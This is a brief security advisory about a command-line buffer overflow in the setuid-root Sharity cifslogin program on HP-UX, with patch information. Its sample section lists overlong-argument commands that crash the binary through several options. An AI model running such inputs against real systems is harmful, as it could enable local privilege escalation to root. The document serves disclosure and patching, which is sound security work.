COMMAND

	Sharity Cifslogin command line arguments buffer overflow

SYSTEMS AFFECTED

	 All releases up to A.01.06 without patch PHNE_24164.

	     release A.01.07 includes the fix.

PROBLEM

	in Alex Hernandez advisory :
	

	<--snap-->
	

	A security vulnerability in the product allows local users  to  overflow
	one of  the  parameters  (-U,  -D,  -P,  -S,  -N,  -u,)  and  cause  the
	application to execute arbitrary  code.  Since  the  program  is  setuid
	root, elevated privileges can be gained.
	

	In case that the attacker provide an  overlong  filename  (for  example,
	longer  than  10000  bytes)  for  example  parameter  \"-P\",  it  would
	overflow a dynamic allocated buffer.The attacker could modify  arbitrary
	memory address (such as saved  return  address,  and  function  pointer,
	etc.)  with  some  features   of   malloc()/free()   implementation   by
	overwriting the border data structure of the next dynamic memory chunk.
	

	<--snap-->
	

	 Sample :

	 ========

	

	$ ./tusc /opt/cifsclient/bin/cifslogin -P `perl -e \'{print \"A\"x10000}\'`

	

	$ /opt/cifsclient/bin/cifslogin -P `perl -e \'{print \"A\"x2072}\'`

	Memory fault

	

	$ /opt/cifsclient/bin/cifslogin -s `perl -e \'{print \"A\"x2072}\'`

	Memory fault

	

	$ /opt/cifsclient/bin/cifslogin -f `perl -e \'{print \"A\"x2072}\'`

	Memory fault

	

	$ /opt/cifsclient/bin/cifslogin -u `perl -e \'{print \"A\"x2072}\'`

	Memory fault

	

	$ /opt/cifsclient/bin/cifslogin -S `perl -e \'{print \"A\"x2072}\'`

	Memory fault

	

	$ /opt/cifsclient/bin/cifslogin -N `perl -e \'{print \"A\"x2072}\'`

	Memory fault

	

SOLUTION

	See  [http://www.software.hp.com],  under   the   Network   and   System
	Management area. Download the patch from [http://itrc.hp.com]